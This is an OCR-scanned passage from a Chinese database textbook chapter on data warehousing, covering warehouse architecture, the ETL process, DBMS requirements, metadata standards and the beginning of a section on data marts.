图 31-1 数据 仓库 的 典型 体系 结构 
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31.2.1 运营 数据 


数据 仓库 的 数据 来 源 主 要 包含 : 

e 存放 在 第 一 代 大 型 机 上 的 层次 和 网 状 数据 库 中 的 运营 数据 。 

e 存放 在 私有 文件 系统 (比如 VSAM 和 RMS) 和 关系 DBMS (比如 Informix 和 
Oracle) 中 的 部 门 数 据 。 

e 存放 在 工作 站 和 私有 服务 器 中 的 私有 数据 。 

e 外 部 系统 ， 例 如 Internet、 商 用 数据 库 或 者 与 企业 供应 商 和 顾客 相关 联 的 数据 库 。 


31.2.2 ”运营 数据 存储 


运营 数据 存储 (ODS) 存储 了 用 于 分 析 当 前 和 集成 后 的 运营 数据 。 它 的 结构 与 数据 来 源 
一 般 都 与 数据 仓库 相同 ， 但 它 事实 上 只 是 数据 进入 数据 仓库 前 的 一 个 准备 区 。 

当 发 现 遗 留 的 运营 系统 不 能 满足 报表 要 求 时 ， 就 需要 创建 ODS。ODS 可 以 让 用 户 方便 
地 使 用 关系 数据 库 ， 但 与 数据 仓库 提供 的 决策 支持 功能 并 不 相同 。 

构建 ODS 有 助 于 创建 数据 仓库 ， 因 为 ODS 能 提供 从 源 系统 中 抽取 并 清洗 了 的 数据 ， 这 
意味 着 为 数据 仓库 集成 和 重 构 数据 剩 下 的 工作 简化 了 。 


31.2.3 ”ETL 管理 器 


ETL 管理 器 执行 所 有 与 提取 和 装载 数据 进 库 相关 的 操作 。 数 据 可 能 直接 从 数据 源 中 提 
取 ，, 或 更 一 般 地 从 ODS 中 提取 。ETL 的 过 程 和 工具 将 在 31.3.1 节 更 详细 地 讨论 。 


31.2.4 仓库 管理 器 


仓库 管理 器 执行 管理 数据 仓库 中 数据 所 必要 的 所 有 操作 。 仓 库 管理 器 执行 的 操作 包括 : 

e 分 析 数 据 以 确保 一 致 性 。 

e 将 临时 存储 中 的 源 数据 转换 和 归并 到 数据 仓库 的 表 中 。 

e 为 基 表 创建 索引 和 视图 。 

@ 进行 逆 规 范 化 (denormatization)( 若 有 必要 的 话 )。 

e 进行 聚集 。 

e 备份 和 归档 数据 。 

在 某 些 情况 下 ， 仓 库 管 理 器 可 以 生成 查询 概述 文件 ， 以 决定 哪些 索引 和 聚集 合适 。 可 以 
为 每 位 用 户 、 每 组 用 户 或 整个 数据 仓库 创建 查询 概述 文件 ， 它 依据 描述 查询 特征 的 信息 ， 如 
查询 频率 、 目 标 表 及 结果 集 的 大 小 等 。 


31.2.5 ”查询 管理 器 


查询 管理 器 执行 所 有 与 用 户 查询 管理 相关 的 操作 。 查 询 管理 器 的 复杂 度 由 终端 用 户 访问 
工具 和 数据 库 所 提供 的 机 制 决 定 。 该 组 件 所 做 的 操作 包括 把 查询 定向 到 相应 表 并 调度 查询 执 
行 。 在 某 些 情况 下 ， 查 询 管理 器 可 以 产生 查询 概述 文件 ， 使 数据 仓库 管理 器 决定 哪些 索引 和 
聚集 合适 。 


31.2.6 ”细节 数据 
数据 仓库 的 这 个 区 按 数据 库 模 式 存储 了 所 有 细节 数据 。 但 在 大 多 数 情 况 下 ， 这 些 细节 数 
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据 并 不 在 线 存 储 ， 而 只 能 看 到 聚集 到 上 一 个 细节 层次 的 数据 。 但 是 常规 而 言 ， 细 节 数 据 要 加 
入 数据 仓库 以 补充 聚集 数据 。 


31.2.7 ” 轻 度 和 高 度 汇总 数据 


数据 仓库 的 这 个 区 中 存储 了 所 有 由 仓库 管理 器 产生 的 预定 义 的 轻 度 或 高 度 汇总 (聚集 ) 
数据 。 该 区 是 临时 的 ， 因 为 它 需 服从 为 响应 不 断 变化 的 查询 概述 文件 而 做 的 变动 。 

存储 汇总 数据 的 目的 是 加 快 查询 的 速度 。 尽 管 在 一 开始 就 汇总 这 些 数 据 可 能 会 有 一 些 操 
作 开 销 ,但 是 这 个 开销 可 以 避免 为 回答 后 续 用 户 查 询 而 进行 的 汇总 操作 (例如 排序 和 分 组 )。 
这 些 汇总 数据 随 着 新 数据 不 断 加 载 到 数据 仓库 而 持续 更 新 。 


31.2.8 存档 /备份 数据 


数据 仓库 的 这 个 区 中 存储 备份 和 归档 的 许多 细节 和 汇总 数据 。 尽 管 汇总 数据 是 从 细节 数 
据 中 产生 的 ， 但 是 还 是 有 必要 备份 这 些 在 线 的 汇总 数据 ， 因 为 它们 可 能 已 经 超过 了 细节 数据 
的 保持 期 。 


31.2.9 ”元 数据 


数据 仓库 的 这 个 区 中 存储 了 数据 仓库 所 有 过 程 使 用 的 元 数据 (关于 数据 的 数据 ) 的 定义 。 
元 数据 的 用 途 很 广泛 ， 包 括 : 

e。 数据 抽取 和 加 载 过 程 : 元 数据 可 用 于 将 源 数据 映射 到 数据 仓库 内 数据 的 公共 视图 。 

e 数据 仓库 管理 过 程 : 元 数据 可 用 于 自动 产生 汇总 表 。 

。 作为 查询 管理 过 程 的 一 部 分 : 元 数据 可 用 于 将 查询 定向 到 最 适合 的 数据 源 。 

由 于 目的 不 同 ， 不 同 过 程 的 元 数据 结构 也 不 同 。 这 意味 对 应 同一 数据 项 可 能 在 数据 仓库 
中 存在 多 个 元 数据 副本 。 另 外 ， 大 部 分 外 购 的 复制 管理 工具 和 终端 用 户 访问 工具 都 使 用 自己 
的 元 数据 。 尤 其 是 复制 管理 工具 ， 使 用 元 数据 来 将 源 数 据 映 射 到 一 个 通用 的 形式 。 终 端 用 户 
访问 工具 使 用 元 数据 来 构建 查询 。 数 据 仓 库 中 的 元 数据 管理 是 一 项 很 复杂 的 任务 ， 不 应 该 被 
忽视 。 数 据 仓库 中 元 数据 管理 的 相关 问题 将 在 31.3.3 节 讨 论 。 


31.2.10 ”终端 用 户 访问 工具 


数据 仓库 的 主要 用 途 是 支持 决策 者 。 这 些 用 户 通 过 终端 用 户 访问 工具 与 数据 仓库 交互 。 
数据 仓库 必须 有 效 地 支持 特定 的 和 例 行 的 分 析 。 预 先 计划 终端 用 户 的 连接 、 汇 总 和 周期 性 报 
表 和 需求 可 获得 高 性 能 。 

尽管 终端 用 户 访 问 工具 的 定义 可 能 重合, 但 是 为 了 讨论 方便 ， 还 是 将 这 些 工 具 分 成 
四 类 : 

e 报表 和 查询 工具 。 

e 应 用 程序 开发 工具 。 

e 联机 分 析 处 理 (OLAP) 工具 。 

e 数据 挖掘 工具 。 

报表 和 查询 工具 

报表 工具 包括 产品 报表 工具 和 报表 书写 器 。 报 表 工 具 可 以 用 来 产生 常规 运营 的 报告 或 支 
持 大 批量 作业 流程 ， 比 如 客户 订单 /发票 和 职员 工资 单 。 而 报表 书写 器 则 是 为 终端 用 户 设 计 
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的 廉价 桌面 工具 。 

关系 型 数据 仓库 的 查询 工具 可 接受 或 产生 SQL 语句 来 查询 数据 仓库 里 的 数据 。 这 些 工 
具 在 用 户 与 数据 库 间 加 一 个 元 数据 层 ， 以 屏蔽 SQL 语句 和 数据 库 结构 的 复杂 性 。 元 数据 层 
用 软件 的 方法 提供 面向 主体 的 数据 库 视 图 ， 并 支持 点 选 式 创建 SQL 语句 。 查 询 工 具 的 一 个 
例子 就 是 QBE ( Query-By-Example， 举 例 查询 )，Microsoft Access DBMS 的 QBE 工具 将 在 
附录 M 中 讨论 。 查 询 工具 在 业务 应 用 用 户 中 非常 流行 ， 如 人 口 统计 分 析 和 客户 邮件 列表 。 
然而 ， 由 于 查询 问题 变 得 越 来 越 复杂 ， 这 些 工具 的 时 效 性 很 短 。 

应 用 程序 开发 工具 

终端 用 户 的 需求 可 能 使 已 有 的 报表 和 查询 工具 无 能 为 力 ， 不 是 所 要 求 的 分 析 工 作 无 法 完 
成 ， 就 是 这 些 工具 对 终端 用 户 的 专业 能 力 要 求 过 高 ， 导 致 交互 无 法 进行 。 在 这 种 情形 下 ， 可 
能 需要 开发 内 部 的 应 用 程序 供用 户 访问 用 ， 这 些 应 用 程序 的 开发 可 以 使 用 为 客户 - 服务 器 环 
境 设 计 的 图 形 数据 访问 工具 。 某 些 应 用 程序 开发 工具 还 集成 了 较为 流行 的 OLAP 工具 ， 并 
能 访问 所 有 主要 的 数据 库 系统 ， 包 括 Oracle、Sybase 和 Informix。 

联机 分 析 处 理 (OLAP) 工具 

OLAP 工具 基于 多 维 数据 库 的 概念 ， 为 有 经 验 的 用 户 提供 复杂 的 多 维 视图 来 分 析 数 据 。 
这 些 工具 的 典型 业务 应 用 包括 市 场 活动 的 有 效 性 评估 、 产 品 销售 预测 和 产能 计划 等 。 这 些 工 
具 假 定数 据 被 组 织 成 多 维 数据 模型 ， 存 储 在 专门 的 多 维 数据 库 或 允许 多 维 查 询 的 关系 数据 库 
中 。OLAP 工具 将 在 第 33 章 详 细 讨 论 。 

数据 挖掘 工具 

数据 挖掘 是 一 个 通过 使 用 统计 、 数 学 和 人 工 智能 技术 挖掘 大 量 数据 ， 发 现 有 价值 的 新 关 
联 、 模 式 和 趋势 的 过 程 。 数 据 挖 掘 工具 有 望 取代 OLAP 工具 ,数据 挖掘 工具 最 特别 之 处 在 
于 它 能 构建 预测 ( predictive) 模型 而 不 是 回顾 ( retrospective) 模型 。 我 们 将 在 第 34 章 详 细 
讨论 数据 挖掘 。 


31.3 ”数据 仓库 工具 与 技术 


本 节 将 讨论 与 构建 和 管理 数据 仓库 相关 的 工具 和 技术 ， 特 别 关 注 与 这 些 工具 集成 相关 的 
问题 。 


31.3.1 提取、 变换 和 加 载 


企业 数据 仓库 (EDW) 最 常 被 提 到 的 优点 之 一 就 是 这 些 集中 式 系统 提供 了 一 个 集成 整 
个 企业 的 企业 数据 视图 。 然 而 ， 完 成 这 样 一 个 有 价值 的 数据 视图 可 能 非常 复杂 和 耗 时 。 加 
入 EDW 的 数据 必须 先 从 一 个 或 多 个 数据 源 提取 ， 然 后 转换 成 一 个 容易 分 析 并 与 已 经 在 仓库 
中 的 数据 一 致 的 形式 ， 最 终 才 加 载 到 EDW 中 。 这 整个 过 程 被 称 为 提取 、 变 换 和 加 载 (ETL ) 
过 程 ， 并 且 是 任何 数据 仓库 项 目 中 的 一 个 关键 过 程 。 

提取 

提取 步骤 针对 EDW 的 一 个 或 多 个 数据 源 。 这 些 来 源 通 常 包括 OLTP 数据 库 ， 但 也 可 以 
包括 个 人 数据 库 和 电子 表格 、 企 业 资 源 规划 ( ERP) 文件 和 Web 使 用 日 志文 件 等 。 数 据 源 通 
常 是 内 部 的 ， 但 也 可 以 包括 外 部 源 ， 例 如 供应 商 和 客户 使 用 的 系统 。 

提取 步骤 的 复杂 性 取决 于 源 系 统 与 EDW 有 和 多 相似 或 不 同 。 如 果 源 系统 文档 齐全 、 维 护 
良好 ， 全 企业 数据 格式 统一 ， 并 使 用 相同 或 相似 的 技术 ,那么 提取 过 程 应 该 是 直接 的 。 但 
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是 ， 另 一 极端 是 源 系 统 没 有 文档 记录 ， 维 护 采 用 不 同 的 数据 格式 和 技术 。 在 这 种 情况 下 ， 
ETL 过 程 将 高 度 复杂 。 提 取 步 又 通常 将 提取 的 数据 复制 到 称 为 运营 数据 存储 (ODS) 的 临时 
存储 或 阶段 区 (SA )。 

与 提取 步骤 相关 联 的 另外 一 些 问题 包括 : 确定 从 每 个 源 系统 提取 数据 到 EDW 的 频率 ; 
监视 对 源 系 统 的 任何 修改 以 确保 提取 过 程 有 效 ; 监控 源 系统 在 性 能 或 可 用 性 上 的 任何 变化 ， 
它们 可 能 影响 到 提取 过 程 。 

变换 

变换 步骤 对 所 提取 的 数据 应 用 一 系列 规则 或 函数 ， 它 决定 了 提取 的 数据 将 如 何 用 于 分 
析 ， 可 能 涉及 的 变换 诸如 数据 汇总 、 数 据 编 码 、 数 据 合并 、 数 据 分 割 、 数 据 计 算 和 创建 代理 
键 ( 见 32.4 节 )。 变 换 的 输出 为 干净 的 、 与 已 经 在 仓库 中 的 数据 一 致 的 数据 ， 而 且 这 些 数据 
已 具备 准备 用 于 分 析 的 形式 。 虽 然 数据 汇总 被 作为 一 种 可 能 的 变换 提 及 ， 但 现在 普遍 推荐 仓 
库 中 的 数据 尽 可 能 保持 在 最 低 粒度 级 别 上 。 这 人 允许 用 户 在 EDW 数据 上 执行 查询 时 能 下 钻 到 
最 详细 的 数据 上 ( 见 33.5 节 )。 

加 载 

将 数据 加 载 到 仓库 中 这 步 可 以 在 所 有 变换 完成 后 进行 或 作为 变换 处 理 的 一 部 分 。 当 数据 
加 载 到 仓库 ， 在 数据 库 模 式 中 定义 的 附加 约束 以 及 在 数据 加 载 时 激活 的 触发 器 将 被 应 用 (如 
唯一 性 、 引 用 完整 性 和 强制 字段 )， 这 也 有 助 于 保证 ETL 过 程 的 整体 数据 质量 。 

在 仓库 中 ， 数 据 可 以 进行 进一步 求 和 或 随后 转发 到 其 他 相关 的 数据 库 ， 如 数据 集 市 或 僻 
送 到 客户 资源 管理 ( CRM) 等 特定 应 用 中 。 与 加 载 步骤 有 关 的 重要 问题 是 确定 加 载 的 频率 及 
加 载 会 如 何 影响 数据 仓库 的 可 用 性 。 

ETL 工具 

ETL 过 程 可 以 通过 定制 程序 或 商品 化 ETL 工具 来 执行 。 在 数据 仓库 的 早期 ， 使 用 定制 
的 程序 进行 ETL 并 不 少见 ， 但 随 着 ETL 工具 市 场 的 成 长 ， 现 有 大 量 的 ETL 工具 可 供 选 择 。 
工具 不 仅 能 自动 完成 提取 、 变 换 和 加 载 的 过 程 ， 还 能 提供 另外 的 机 制 ， 如 数据 分 析 、 数 据 质 
量 控制 和 元 数据 管理 等 。 

数据 分 析 和 数据 质量 控制 

数据 分 析 提 供 有 关 来 自 源 系 统 的 数据 数量 和 质量 的 重要 信息 。 例 如 ， 数 据 分 析 可 以 指示 
有 多 少 行 具有 缺失 、 不 正确 或 不 完整 的 数据 项 以 及 每 列 值 的 分 布 。 该 信息 有 助 于 确定 为 清洗 
数据 而 需 进行 的 变换 ， 以 及 如 何 将 数据 更 改 为 适合 装载 到 仓库 的 形式 。 

元 数据 管理 

要 完全 理解 查询 结果 ， 通 常 需要 考虑 包含 在 结果 集中 数据 的 历史 。 换 句 话说， 在 ETL 
过 程 中 数据 发 生 了 什么 ? 这 个 问题 的 答案 可 在 称 为 元 数据 存储 库 (metadata repository) 的 存 
储 区 中 找到 。 此 库 由 ETL 管理 工具 管理 ， 保 留 着 仓库 中 数据 的 各 种 信息 ， 包 括 源 系统 的 详 
情 、 任 何 数据 变换 的 细节 、 任 何 数据 合并 和 分 割 的 细节 。 此 完整 数据 历史 (也 称 为 数据 沿革 ) 
可 供 仓 库 的 用 户 使 用 ， 也 能 进行 查询 结果 验证 ， 或 提供 对 结果 集中 显示 的 某 些 由 ETL 过 程 
引起 的 异常 的 解释 。 


31.3.2 ”数据 仓库 DBMS 


与 数据 仓库 数据 库 集 成 相关 的 问题 很 少 。 由 于 产品 成 熟 ， 大 部 分 关系 型 数据 库 都 能 与 其 
他 类 型 的 软件 集成 。 但 是 存在 一 些 问题 与 数据 仓库 数据 库 的 潜在 规模 相关 。 数 据 库 中 的 并 行 
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成 为 一 个 重要 问题 ， 还 有 性 能 、 规 模 、 可 用 性 、 可 管理 性 等 常见 问题 ， 在 选择 一 个 DBMS 
时 都 必须 加 以 考虑 。 下 面 首先 列 出 对 数据 仓库 DBMS 的 需求 ， 然 后 考虑 如 何 通过 并 行 技术 
满足 这 些 需 求 。 


对 数据 仓库 DBMS 的 需求 
对 一 个 适合 数据 仓库 的 关系 型 DBMS 的 特殊 需求 已 发 ” 表 31-3 对 数据 仓库 DBMS 的 需求 
布 在 白皮书 上 (Red Brick Systems，1996 )， 如 表 31-3 所 列 。 加 载 性 能 
加 载 性 能 “数据 仓库 需要 周期 性 地 在 一 个 窗 的 时 间 窗 加 载 处 理 
口内 以 增 量 的 方法 加 载 新 数据 。 加 载 过 程 的 性 能 可 以 以 每 数据 质量 管理 
小 时 百 兆 行 或 G 字 节 数据 来 衡量 ， 并 上 且 应 该 没有 上 限 约束 。 查询 性 能 
加 载 处 理 ”在 数据 仓库 加 载 新 数据 和 更 新 数据 都 需 高 可 扩展 性 
要 许多 步 又， 包括 数据 变换 、 过 滤 、 重 新 格式 化 、 完 整 用 户 数量 可 伸缩 性 
性 检查 、 物 理 存储 、 建 立 索引 及 元 数据 更 新 。 虽 然 每 一 网 络 化 数据 仓库 
步 做 起 来 都 可 能 是 个 原子 过 程 ， 但 整个 加 载 过程 应 该 像 数据 仓库 管理 
一 个 单一 无 颖 的 工作 单元 。 集成 维度 分 析 
数据 质量 管理 ”转变 为 基于 事实 的 管理 需要 具备 最 高 级 查询 功能 


高 的 数据 质量 。 无 论 数据 源 有 多 “ 脏 "， 数 据 量 有 多 大 ， 

数据 仓库 都 必须 保证 局 部 一 致 性 、 全 局 一 致 性 和 引用 完整 性 。 加 载 和 预 处 理 这 两 个 步 又 虽然 
是 必要 的 ， 但 并 不 充分 。 回 答 终 端 用 户 查询 的 能 力 才 是 衡量 数据 仓库 应 用 成 功 的 标准 。 问 题 
回答 得 越 多 ， 分 析 者 问 的 问题 就 会 越 复杂 、 越 有 创意 。 

查询 性 能 ”基于 事实 的 管理 和 特定 分 析 一 定 不 能 受 数据 仓库 DBMS 性 能 的 影响 ， 关 键 
业务 操作 的 大 型 复杂 查询 必须 在 合理 的 时 间 间 隔 内 完成 。 

高 可 扩展 性 ”数据 仓库 的 规模 增长 速度 很 快 ， 大 小 通常 从 T 字 节 ( 10” 字 节 ) 到 了 字 节 
(10” 字 节 )。DBMS 在 体系 结构 上 一 定 不 能 限制 数据 库 的 大 小 ， 应 该 支持 模块 化 和 并 行 的 管 
理 。 在 发 生 故 障 时 ，DBMS 应 该 保证 数据 仓库 的 可 用 性 并 提供 相应 的 恢复 机 制 。DBMS 还 
要 支持 大 规模 存储 设备 (如 光盘 ) 和 分 层 存储 管理 设备 。 最 后 ， 查 询 的 性 能 不 应 该 受 数据 库 
大 小 的 影响 ， 而 只 应 该 与 查询 的 复杂 度 有 关 。 

用 户 数量 可 伸缩 性 ”目前 的 认识 是 对 数据 仓库 的 访问 只 限定 为 少量 的 管理 型 用 户 。 但 随 
着 人 们 逐渐 意识 到 数据 仓库 的 价值 ， 情 况 不 会 总 是 这 样 。 可 以 预言 ， 数 据 仓库 DBMS 将 来 
必须 要 有 能 力 支 持 成 百 上 千 的 并 发 用 户 ， 同 时 还 要 保持 可 接受 的 查询 性 能 。 

网 络 化 数据 仓库 ”数据 仓库 系统 应 该 能 在 更 大 的 数据 仓库 网 络 中 协同 工作 。 数 据 仓库 必 
须 有 工具 ， 协 调 数据 子 集 在 数据 仓库 间 的 移动 。 用 户 也 应 该 可 以 在 单个 客户 工作 站 上 看 到 和 
操作 多 个 数据 仓库 。 

数据 仓库 管理 数据 仓库 具有 规模 大 、 操 作 有 周期 性 的 特性 ， 要 求 管理 要 方便 灵活 。 
DBMS 必须 提供 这 样 一 些 控制 ， 如 实现 资源 限制 、 用 户 计 费 ， 以 及 询问 优先 级 以 处 理 不 同等 
级 的 用 户 和 应 用 的 需要 。DBMS 还 必须 能 对 工作 负载 进行 跟踪 及 调整 ， 以 优化 系统 资源 达到 
最 大 性 能 和 吞吐 量 。 实 现 一 个 数据 仓库 最 直观 、 可 度量 的 价值 表现 在 它 能 为 终端 用 户 提供 无 
限制 的 、 有 创意 的 数据 访问 。 

集成 维度 分 析 ”多维 视图 的 强大 已 被 广泛 接受 ,数据 仓库 DBMS 必须 内 置 维 度 分 析 ， 
为 关系 OLAP 工具 (参见 第 33 章 ) 提供 最 好 的 性 能 。DBMS 必须 能 快速 、 方 便 地 预先 计算 
一 些 大 型 数据 仓库 中 常用 的 汇总 数据 ， 并 提供 维护 工具 自动 化 这 些 预先 计算 的 聚集 。 聚 集 的 
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动态 计算 应 该 与 终端 用 户 的 交互 性 能 需求 保持 一 致 。 

高 级 查询 功能 ”终端 用 户 有 时 需要 进行 高 难度 的 分 析 计 算 、 序 列 和 比较 分 析 ， 还 要 能 对 
细节 和 汇总 数据 进行 一 致 的 访问 。 有 时 在 客户 - 服务 器 点 选 式 工具 环境 下 使 用 SQL 语句 不 
现实 ， 或 因 用 户 查询 复杂 甚至 不 可 能 。DBMS 必须 提供 一 组 完整 和 高 级 的 分 析 操 作 。 

并 行 DBMS 

数据 仓库 技术 需要 处 理 大 量 的 数据 ， 并 行 数据 库 技术 给 出 了 改善 系统 性 能 的 一 种 方案 。 
并 行 DBMS 的 成 功 有 赖 于 许多 资源 的 有 效 运 作 ， 包 括 处 理 机 、 内 存 、 磁 盘 和 网 络 连接 。 随 
着 数据 仓库 的 不 断 普及 ， 许 多 供应 商都 使 用 并 行 技术 来 构建 大 型 决策 支持 DBMS。 目 标 就 是 
通过 多 个 网 络 结 点 在 同一 个 问题 上 工作 来 解决 决策 支持 问题 。 并 行 DBMS 的 主要 特征 是 可 
伸缩 性 、 可 操作 性 和 可 用 性 。 

并 行 DBMS 能 同时 执行 多 个 数据 库 操作 ， 它 能 将 单个 任务 分 成 几 个 更 小 部 分 ， 分 布 在 
多 个 处 理 机 上 并 行 执行 。 并 行 DBMS 必须 要 能 够 支持 并 行 查询 。 换 名 话说， 就 是 要 能 够 把 
复杂 的 查询 分 成 几 个 子 查询 同时 执行 ， 最 后 将 子 查询 结果 再 组 合 起 来 。 这 种 DBMS 还 要 包 
括 其 他 一 些 功能 ， 如 并 行 数据 装载 、 表 扫描 、 数 据 存档 与 备份 。 有 两 种 主要 的 并 行 硬 件 体系 
结构 通常 被 用 作 数 据 仓库 的 数据 库 服务 器 平台 : 

e 对 称 多 处 理 机 ( Symmetric Multi-Processing，SMP ) : 一 组 紧 耦 合 的 处 理 器 ， 它 们 共 

享 内 存 和 磁盘 存储 。 

e 大 规模 并 行 处 理 (MPP) : 一 组 松 耘 合 的 处 理 器 ， 每 一 台 处 理 器 都 有 自己 的 内 存 和 磁 

盘存 储 。 

SMP 与 MPP 并 行 体系 结构 在 24.1.1 节 已 详细 描述 。 


31.3.3 ”数据 仓库 元 数据 


数据 仓库 的 集成 有 许多 问题 ， 本 节 将 讨论 元 数据 的 集成 问题 ， 元 数据 是 描述 数据 的 数据 
( Darling，1996 )。 管 理 数据 仓库 的 元 数据 是 一 个 极端 复杂 和 困难 的 工作 。 元 数据 被 用 于 各 
种 用 途 ， 管 理 元 数据 是 实现 完全 集成 化 的 数据 仓库 的 一 个 关键 问题 。 

元 数据 的 主要 用 途 是 显示 数据 的 来 路 ， 使 数据 仓库 管理 员 可 以 获知 数据 仓库 中 每 一 数 
据 项 的 来 历 。 然 而 ， 元 数据 在 数据 仓库 中 还 有 几 个 功能 ， 它 与 数据 变换 、 装 载 、 数 据 仓 库 管 
理 、 查 询 生成 等 过 程 相关 (参见 31.2.9 节 )。 

与 数据 变换 和 加 载 相关 的 元 数据 必须 描述 源 数据 及 对 它们 所 做 的 任何 改变 。 例 如 ， 对 于 
每 一 个 源 字段 ， 都 应 该 有 唯一 的 标识 符 、 初 始 字段 名 、 源 数据 类 型 、 包 括 系 统 名 和 对 象 名 的 
初始 定位 ， 以 及 目标 数据 类 型 和 目标 表 名 。 如 果 字 段 发 生 任 何 变化 ， 如 类 型 由 简单 类 型 变 为 
过 程 或 函数 的 复杂 集 ， 都 要 记录 下 来 。 

与 数据 管理 相关 的 元 数据 描述 数据 仓库 中 存储 的 数据 。 数 据 库 中 的 每 一 个 对 象 都 需要 描 
述 ， 包 括 每 个 表 中 的 数据 、 索 引 、 视 图 ， 还 有 任何 相关 的 约束 ， 这 些 信 息 都 存储 在 DBMS 
系统 目录 中 。 然 而 ， 还 有 另外 一 些 需求 是 关于 数据 仓库 用 途 的 ， 例 如 ， 元 数据 还 要 描述 与 聚 
集 相 关联 的 字段 ， 包 括 所 执行 聚集 的 描述 。 另 外 ， 表 分 割 也 需 描 述 ， 包 括 分 割 关 键 字 和 与 那 
个 分 割 关 联 的 数据 范围 。 

如 前 所 述 ， 查 询 处 理 器 也 需要 使 用 元 数据 来 产生 合适 的 查询 。 反 之 ,查询 处 理 器 又 产生 
与 正在 运行 的 查询 相关 的 元 数据 ， 这 些 元 数据 可 用 于 为 所 有 查询 产生 历史 ， 也 可 用 于 为 每 位 
用 户 、 每 组 用 户 或 数据 仓库 产生 查询 概述 文件 。 还 有 与 查询 用 户 相 关联 的 元 数据 ， 包 括 : 在 
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特定 数据 库 中 描述 “价格 ”和 “顾客 ”含义 的 信息 ， 以 及 该 含义 是 否 随时 间 变 化 过 等 。 
同步 元 数据 

元 数据 集成 的 主要 问题 是 如 何 同步 数据 仓库 中 各 种 类 型 的 元 数据 。 数 据 仓库 的 不 同 工 具 
产生 和 使 用 自己 的 元 数据 ， 为 了 实现 集成 ， 这 些 工 具 需 要 共享 它们 的 元 数据 。 同 步 来 自 不 同 
生产 商 、 使 用 不 同 元 数据 存储 的 不 同 产品 的 元 数据 是 个 非常 具有 挑战 性 的 问题 。 例 如 ， 必 须 
在 一 个 产品 中 识别 出 合适 的 细节 层 上 正确 的 元 数据 项 ， 然 后 将 其 映射 到 另 一 产品 对 应 的 细节 
层 合适 的 元 数据 项 上 ， 再 找 出 它们 之 间 的 编码 差别 。 这 个 过 程 对 这 两 个 产品 共有 的 所 有 其 他 
元 数据 都 要 重复 一 遍 。 而 且 ， 对 其 中 一 个 产品 的 元 数据 〈 甚 至 元 元 数据 ) 的 任何 改变 都 需要 
传递 给 另 一 个 产品 。 在 两 个 产品 间 同 步 元 数据 已 经 非常 复杂 ， 在 构成 数据 仓库 的 所 有 产品 中 
重复 这 个 过 程 将 会 极其 耗费 资源 。 然 而 ， 元 数据 的 集成 却 是 必需 的 。 

最 初 ， 关 于 在 数据 仓库 和 基于 组 件 开发 领域 的 元 数据 和 建 模 存在 两 个 标准 ， 由 元 数据 联 
合 协会 (Meta Data Coalition，MDC) 和 对 象 管理 组 ( Object Management Group ，OMG ) 分 
别提 出 。 目 前 这 两 个 工业 化 组 织 联合 宣布 ，MDC 已 并 入 OMG。 今后 MDC 不 再 独立 操作 ， 
后 续 在 OMG 的 工作 就 是 致力 于 集成 这 两 个 标准 。 

MDC 并 人 OMG 标志 着 主要 的 数据 仓库 与 元 数据 供应 商 在 标准 上 达成 了 一 致 ，MDC 的 
开放 信息 模型 ( Open Information Model，OIM) 与 OMG 的 通用 数据 仓库 元 模型 (Common 
Warehouse Meta-model，CWM) 很 好 地 协调 统一 起 来 。 当 整个 合并 工作 完成 以 后 ，OMG 就 
会 发 布 新 的 CWM 版 本 ， 这 个 统一 标准 使 得 不 同 供应 商 的 不 同 产品 的 元 数据 能 够 互相 共享 。 

OMG 的 CWM 建立 在 多 个 标准 之 上 ,包括 OMG 的 UML ( Unified Modeling Language， 
统一 建 模 语言 ) XMI (XML Meta-data Interchange, XML 元 数据 交换 )、MOF (Meta 
Object Facility， 元 对 象 机 制 ), 还 有 MDC 的 OIM。CWHM 由 若干 公司 联合 开发 ， 包 括 IBM、 
Oracle、Unisys、Hyperion、Genesis、NCR、UBS 和 Dimension EDI。 


31.3.4 ”执行 和 管理 工具 


数据 仓库 需要 配套 相应 的 工具 ， 以 管理 和 整治 这 样 一 个 复杂 的 环境 。 这 些 工具 必须 能 够 
支持 以 下 任务 : 
监控 从 多 数据 源 加 载 数 据 。 
数据 质量 与 完整 性 检查 。 
管理 与 更 新 元 数据 。 
监控 数据 库 性 能 ， 确 保 高 效 地 查询 响应 时 间 和 资源 利用 率 。 
对 数据 仓库 的 使 用 进行 审计 ， 以 提供 用 户 付 费 信息 。 
复制 、 子 集 化 和 分 布 数据 。 
保持 有 效 的 数据 存储 管理 。 
清理 数据 。 
存档 和 备份 数据 。 
实现 故障 后 的 恢复 。 
安全 管理 。 


31.4 数据 集 市 
本 节 描 述 了 什么 是 数据 集 市 及 创建 数据 集 市 的 理由 。 
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数据 集 市 | 包含 企业 数据 的 一 个 子 集 的 数据 库 ， 用 于 支持 某 个 具体 业务 部 门 (例如 销售 部 ) 
的 分 析 需 求 或 用 于 支持 共享 菜 一 特定 的 业务 流程 (例如 房产 销售 ) 分 析 需 求 的 用 户 们 。 


随 着 数据 仓库 的 普及 ， 才 有 了 相关 的 数据 集 市 (data mart) 的 概念 。 虽 然 术语 “数据 集 
市 ”被 广泛 使 用 ， 但 数据 集 市 实际 上 代表 什么 仍然 存在 一 些 混乱 。 一 般 认 为 ， 构 建 数据 集 市 
以 支持 一 组 特定 用 户 的 分 析 需 求 ， 并 且 在 提供 这 种 支持 时 ， 数 据 集 市 只 存储 了 企业 数据 的 一 
个 子 集 。 然 而 ， 在 数据 集 市 中 实际 存储 什么 数据 、 与 企业 数据 仓库 (EDW) 的 关系 以 及 一 
组 用 户 由 什么 构成 这 些 细节 上 ， 仍然 出 现 了 混乱 。 造 成 混乱 可 能 部 分 是 因为 数据 集 市 /EDW 
的 两 个 主要 的 方法 学 使 用 的 术语 ， 一 个 方法 学 是 Kimball 的 业务 维度 生命 周期 ( Kimball， 
2006 )， 另 一 个 是 Inmon 的 企业 信息 工厂 (CIF) 方法 (Inmon，2001 )。 

在 Kimball 的 方法 学 中 ， 数 据 集 市 是 在 特定 业务 流程 (例如 房产 销售 ) 上 的 单个 星 形 模 
式 (维度 模型 ) 的 物理 实现 。Kimball 的 数据 集 市 的 用 户 可 以 遍布 企业 ,但 是 都 有 分 析 一 个 
特定 业务 流程 的 相同 需求 。 当 一 个 企业 的 所 有 业务 流程 都 表示 为 数据 集 市 后 ， 集 成 这 些 数据 
集 市 就 形成 EDW。 

使 用 Inmon 的 方法 学 ， 数 据 集 市 是 支持 企业 特定 业务 单位 (例如 销售 部 门 ) 的 分 析 需 求 
的 数据 库 的 物理 实现 。Inmon 的 数据 集 市 从 EDW 中 接收 数据 。 

如 前 所 述 ， 数 据 集 市 与 其 关联 的 数据 仓库 的 关系 取决 于 使 用 哪 种 方法 学 来 构建 数据 集 
